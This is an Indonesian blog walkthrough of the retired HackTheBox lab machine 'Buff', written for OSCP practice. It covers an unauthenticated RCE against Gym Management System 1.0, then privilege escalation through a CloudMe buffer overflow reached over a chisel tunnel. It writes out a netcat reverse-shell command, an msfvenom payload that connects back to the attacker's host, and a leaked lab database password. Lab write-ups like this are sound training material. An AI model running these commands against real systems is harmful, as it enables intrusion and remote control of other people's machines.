Open in app

Sign in

Write

Sign in

HACKTHEBOX WALKTROUGH

Buff Machines

CVE-CWE N/A (Without Metasploit)

Dimas Kusuma
4 min readJan 15, 2021

--

Trimakasih sudah meluangkan waktu untuk membaca artikel ini. Saat ini penulis menghadapi mesin retired HTB “Buff” yang dimana total ada 72 mesin retired setelah penulis memperbarui list target penulis yang terdapat pada list netsecfocus, dan penulis akan menempuh list target tersebut dan di dokumentasikan di akun medium ini.

Semoga pembaca semakin diberkahi dan ditingkatkan keilmuannya, serta selalu tercapai setiap tujuan dan cita-citanya atas Kehendak-Nya, juga yang sedang menempuh sertifikasi OSCP semoga tercapai dan sukses total, Aamiin. Full list mesin retired HTB oleh netsecfocus dapat di akses disini.

Reconnaissance

Penulis memulai dengan melakukan reconnaissance terhadap server target menggunakan nmap.

Gist 1

Notes :

  1. Terdapat port 7680 pand-hub, penulis tidak mengetahui apakah service ini. Kemungkinan penulis akan melakukan enumeration lebih dalam.
  2. Port 8080 http, jelas ini adalah webserver, kemungkinan akan terdapat aplikasi web atau apapun itu yang bisa menjadi initial foothold penulis.

Enumeration

Penulis mengunjungi address target melalui firefox browser tepatnya pada port 8080.

http://10.10.10.198:8080/contact.php
Gambar 1

Penulis mendapatkan informasi seperti pada Gambar 1, bahwa terdapat “Gym Management Software 1.0”.

Kemudian penulis melakukan pencarian informasi exploit untuk “Gym Management Software 1.0”.

Gambar 2

Pada Gambar 2 ditemukan exploit Unauthenticated Remote Code Execution untuk “Gym Management System 1.0”.

Initial Shell

Kemudian penulis hanya perlu menjalankan exploit Unauthenticated RCE untuk “Gym Management System 1.0”.

Gist 2
Gambar 3

pada tahapan seperti pada Gambar 3, penulis sebenarnya sudah mendapatkan initial shell, namun shell tersebut sangat tidak stabil. Maka penulis akan melakukan reverse shell untuk mendapatkan shell yang lebih stabil.

Dikarenakan penulis akan melakukan reverse shell menggunakan ncat, maka penulis terlebih dahulu akan memindahkan nc.exe dari localhost penulis ke server target.

copy \\10.10.14.3\kcrt\nc.exe nc.exe#smbserverpython-kcrt -smb2support
Gambar 4

Lalu dilanjuti dengan melakukan reverse shell menggunakan ncat. Sebelumnya penulis menjalankan listener pada port 888 menggunakan ncat.

# nc -lvvp 888

Lalu pada shell yang sebelumnya penulis sudah dapatkan melalui exploit Unauthenticated RCE hanya perlu menjalankan nc.exe untuk terkoneksi dengan port 888 yang sudah di buka oleh ncat yang dijalankan di localhost penulis.

nc.exe 10.10.14.3 888 -e cmd
Gambar 5

Penulis mendapatkan credentials pada file config psl-config.php .

type psl-config.php
Gambar 6
define("HOST", "localhost");     // The host you want to connect to.
define("USER", "sec_user");    // The database username. 
define("PASSWORD", "4Fa98xkHVd2XmnfK");    // The database password. 
define("DATABASE", "secure_login");    // The database name.

Privilege Escalation

Penulis menemukan anomali pada saat melakukan enumeration untuk seluruh direktori di direktori initial user.

c:\users\shaun\> dir /s *
Gambar 7

Seperti yang ditemukan pada Gambar 7 dimana terdapat “CloudMe_1112.exe” di direktori downloads pada user shaun. Penulis memastikan bahwa “CloudMe_1112.exe” berjalan pada server target di port 8888 setelah penulis menjalankan netstat.

netstat -an |findstr 8888
Gambar 8

Penulis melanjutkan dengan mencari exploit cloudme di exploit-db melalui searchsploit.

# searchsploit cloudme
Gambar 9

Dikarenakan port cloudme di 8888 hanya berjalan untuk localhost di server target, maka penulis terlebih dahulu harus melakukan port tunneling agar port 8888 di localhost server target terhubung dengan localhost penulis.

Penulis melakukan tunneling dengan chisel.

Gambar 10

Sebelum melakukan modifikasi pada file exploit, penulis terlebih dahulu melakukan generate payload.

msfvenom -a x86 -p windows/exec CMD='C:\xampp\htdocs\gym\upload\nc.exe 10.10.14.35 999 -e cmd' -b '\x00\x0A\x0D' -f python -v payload

Berikut adalah file exploit cloudme untuk melakukan privilege escalation.

Gist 3

Lalu dilanjuti dengan melakukan eksekusi pada exploit python dimana pada bagian terminal lainnya penulis menjalankan listener pada port 999 melalui ncat.

Gambar 11

Penulis mendapatkan sesi administrator.

Kesimpulan

Merupakan mesin yang sangat mirip dengan exam OSCP offensive, dimana pada bagian privilege escalation sangat realistic dan non ctf-like.

Reference

  1. https://research-labs.net/search/exploits/gym-management-system-10-unauthenticated-remote-code-execution
  2. https://www.techsupportalert.com/content/use-command-line-easily-create-list-your-personal-files-your-music-your-pictures-or-whatever#:~:text=Open%20the%20command%20line%20at,%E2%80%9D%20(without%20quotes)%20instead.
  3. https://medium.com/@incubusattax/setting-up-an-ssh-tunnel-using-plink-7d8dacfd4014
  4. https://0xdf.gitlab.io/2020/08/10/tunneling-with-chisel-and-ssf-update.html
  5. https://medium.com/@vegardw/reverse-socks-proxy-using-chisel-the-easy-way-48a78df92f29
  6. https://book.hacktricks.xyz/tunneling-and-port-forwarding
  7. https://www.puckiestyle.nl/pivot-with-chisel/

Target

43 mesin lagi !

Oscp Preparation
Buff Htb Machine
Oscp Like

--

--

Dimas Kusuma

Written by Dimas Kusuma

6 Followers

limitations only in our mind

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams